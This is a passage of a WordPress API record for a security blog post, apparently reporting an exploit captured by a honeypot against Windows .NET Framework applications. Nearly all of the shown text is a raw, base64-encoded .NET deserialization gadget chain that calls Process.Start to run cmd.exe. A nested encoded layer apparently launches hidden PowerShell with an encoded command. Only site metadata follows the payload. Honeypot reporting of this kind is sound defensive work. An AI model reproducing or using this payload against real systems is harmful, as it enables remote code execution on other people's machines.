FSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFFUUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==<\/anyType> <\/MethodParameters> <\/ProjectedProperty0> <\/ExpandedWrapperOfObjectStateFormatterObjectDataProvider><\/item><\/profile>;   Target System: Windows with .NET Framework   Malicious File Path from the Read more about Honeypot Extraction -Windows .NET Framework<\/span>[…]<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[10,11,9,8,7,6],"class_list":["post-498","post","type-post","status-publish","format-standard","hentry","category-honeypot","tag-ai","tag-artificial-intelligence","tag-cloudcoffer","tag-honeypot","tag-zero-day","tag-zero-day-exploit"],"_links":{"self":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts\/498","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=498"}],"version-history":[{"count":12,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts\/498\/revisions"}],"predecessor-version":[{"id":534,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts\/498\/revisions\/534"}],"wp:attachment":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=498"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=498"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}